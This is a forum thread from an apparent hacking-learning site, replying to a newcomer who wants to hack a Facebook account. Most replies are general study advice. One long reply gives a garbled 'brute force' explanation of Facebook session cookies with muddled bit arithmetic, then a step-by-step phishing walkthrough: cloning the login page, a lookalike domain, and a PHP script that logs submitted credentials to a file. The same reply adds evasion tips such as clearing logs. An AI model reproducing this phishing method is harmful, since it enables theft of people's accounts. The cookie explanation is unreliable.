Need help guys

So you are new to hacking and know nothing and want to hack a Facebook account?
Don’t you think that if it was so easy to hack Facebook that it would be down all the time?
You won’t get help hacking Facebook here.
You can learn some basic stuff about security here.

You should start by completing the levels on this page. It helps a lot. You can check the forum and the article section for more help.

Then Google is your friend:
- Learn how to read the source code of an HTML page.
- Learn how a web server works, including the HTTP requests and responses (e.g. 200, 30x, 40x, 50x)
- Learn how javascript works.
- Learn a programming language such as PHP, perl, python etc.
Basically hacking is knowing how a system works. If you know how a system works (or how a developer thinks and codes) you can try to bypass it.
11 years ago
Hacking really is a huge subject.
BTW nice avatar. Are you an FF Fan?

You cant start on top,even if you learn to hack something. In time things will change and you have to be able to learn anew.
Dont learn just one thing or one way to hack
Trail and error/read your ass off/when in doubt ask google

Learning takes a lot of time. Anyone who wants to learn hacking in couples of weeks/months should clearly know the meaning of “learning” first.

Learn some HTML before you start any level. Viewing the source won’t help you at all if you don’t know how it works.

Try to complete the levels on this site, it will help a lot. You will need to know the basics; so learn how to view a source, learn some basic programming and basic html, and practice it so you wont forget.
You could try using sites like CodeAcademy or W3Schools too help you learn some basics.
And just remember Google is your friend.
JAYSSJ11- “I’d rather be hated for who I am, than loved for who I am not.”

- @IAmDevil
Its good to be back! :D might be a good source to start. You’ll need some hardware though to be able to inject packets.
Okay there’s 2 ways of hacking a facebook account…
I’m not going to go into detail on how to do any of this and you’ll see why!
Brute Force Method:
You’re going to need to stream 160 bits of data via php cookie. Broken down that would be:
IP Address of the person whos facebook you’re hacking : 32 bits
epoch = January 1, 1970: 32 bits
microseconds that the client first recieved their cookie: 32 bits
Finally a random value that is generated: 64 bits
32 bits
32 bits
32 bits
64 bits
160 bits
But streaming that much data would take up to about 5,000,000 years
So to accomplish this goal you would have to hash out this data in md5 or sha1, reducing it by 8 bytes and stream it in separate cookies.
You would have to aquire all of this information though.
For example:
the last 64 bits of the entropy is
X=the time the server started
y=the exact miliseconds the server started
w=process id of linux
z=random 20 bits generated
Now we take
s1+s2=64 bits
So once you have that 64 bits you still have another 96 bits to aquire.
So you can come up with your own cheeky method to aquire the IP Address, 32 bits.
Now you need 64 bits which are the the epoch and the microseconds that the user first got their cookie
To get the microsecond the user required their cookie can be done through the chat, which uses ajax to see whether or not that the user is online. Using a packet sniffer to retrieve that data you now have that time… Hooray! Convert that to epoch, 1 January 1970 00:00:00.
Now you have the 32 bits left epoch 1 January 1970 00:00:00 which was already given.
Once all of this information is hashed, you will be reduced down to 20 bits. As I said you will have to stream all of that data in separate cookies to avoid spending your after life still Brute Forcing the victims facebook. So that will be 1,048,576 cookies and can be done in 500,000 requests which shouldn’t take that long depending on the speed of your internet.
Second method…
Phishing Method
You take the source code of the facebook login page, save all of the images, and save it in a text editor as index.html. Find a free webhost to upload it to, sign up, name your site to something inconspicuous, and upload.
You should save the site as something like or or or even
Just so it looks actually like facebook. So since you’ll probably not invest in a premium webhosting account
They’ll take your site and name it something like
Now go into the html document and search for action until you come around this tag
where action= in quotes type the name of your php file we’ll talk about below.
for example
The file can be named anything but it has to have the .php extension at the end.
The script should look something like this
header (‘Location:"’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);
This is not my script but someone elses script since this is the most popular method of facebook account hacks.
So now you will send your fake facebook form url to the victim. Once they recieve it make sure to come up, using your social engineering abilities, something clever to con them into typing their username and password into the login form. Once they hit login, that is the action=“output.php” part, php will work it’s magic to outputing a text file called usernames.txt containing the login credentials you will then use to obtain access to the facebook account. Now that you’ve aquired that information login, viola!
BUT! there’s a catch… You need to understand what all of this means. This is just an example of stuff you will come accross in time with your hacking experience.
Hacking: Unconventional ways of accessing information -Eli the Computer Guy
I’m going to give you some hacking homework :) :
Look up and study these Terms:
-markup languages
-high level programming languages
-low level programming languages
-Framework (Better than Software)
-server side scripting
-graphical user interface (GUI)
-line user interface (LUI)
-password hashing
-Internet Protocol Address (IP Address)
-External IP Address
-Internal IP Address
-Transmission Control Protocol (TCP)
-User Datagram Protocol (UDP)
-Hypertext Transfer Protocol (HTTP)
-Hypertext Transfer Protocol Secure (HTTPS)
-File Transfer Protocol (FTP)
-Simple Mail Transfer Protocol (SMTP)
-Secure Shell (SSH)
-Operating System
-Storage Space
-Network Sharing
-File extenstions
-Port Scanning
-Proxy Servers
-Virtual Private Networks
-Web Browser
Once you’ve done that and have plenty of research done on and a good understanding what these terms mean, get familiar with using Line User Interfaces opposed to Graphical User Interface. Learn the commands that are within the systems, what they do, how they work, and what arguments come with them. Once you have a fair understanding of all of this information you should be able to start messing with your own things and coming up with custom attacks.
Note: It’s good to inspect and view others code but never copy, because you’ll never learn that way. That term is called kiddie scripting.
If not already, get familiar with Linux Operating Systems. There’s many of them and they are all free and open sourced unlike other operating systems. Note that every operating system is good for their own use.
Some good popular Linux distributions designed for hackers are:
-Kali Linux
-Matriux Krypton
-Red Hat
Keep up to date with all software, operating systems, and security vulnerabilities.
Once this all comes hand in hand learn html, css, and some programming languages.
Languages essential and good to start with:
-python (need libraries)
-vbs (only for microsoft windows)
You can learn some languages at and w3schools like Night3Shad said and yes, Google is your friend.
Learn Binary and Hexadecimal for sure and how basic computing works. 8 bits = a byte that kind of stuff y ‘know.
Be Safe
Be Secure
Never use your own personal information
Never use your email accounts
Never use your own Network
Be Creative
Think outside of the box
Inspect code
Look for vulnerabilities
Clear your logs
Have Fun!
Here’s a little push and good resources:
Eli the Computer Guy
This his Hacking Course Playlist here:
If you want to read more about that first attack I showed you, it was not developed by me, here you go:
Happy Hacking, Have Fun…..

@MaxLockhart: Too long, didn’t read. But it is a very effective post for some “hackers” who want to hack Facebook. It’s too long for them to read and to understand, lol. :p

@MaxLockhart lol Nice post sir. :D You should write an article for this site.
freewind1012 and redknight99 Thank you very much! I’ll think about it For sure. But, I’m not sure if that would go against the Terms of Agreement for when I signed up for the site. Why I kept the information so vague. I have some projects being worked on and will probably post some stuff on that for sure. I’ll post on phishing in some time but that’s just common information lol I’ll maybe do it tomorrow idk. But as far as brute forcing a facebook login I’m going to have to make it simple enough to teach. Just hope I don’t get sued haha
just submit article it will be reviewd by admins . they will decide whether it should be approved or not
JAYSSJ11- “I’d rather be hated for who I am, than loved for who I am not.”

Yeah, it will be an informative post if you can make a step-by-step tutorial. Then obviously it will get approved by admin.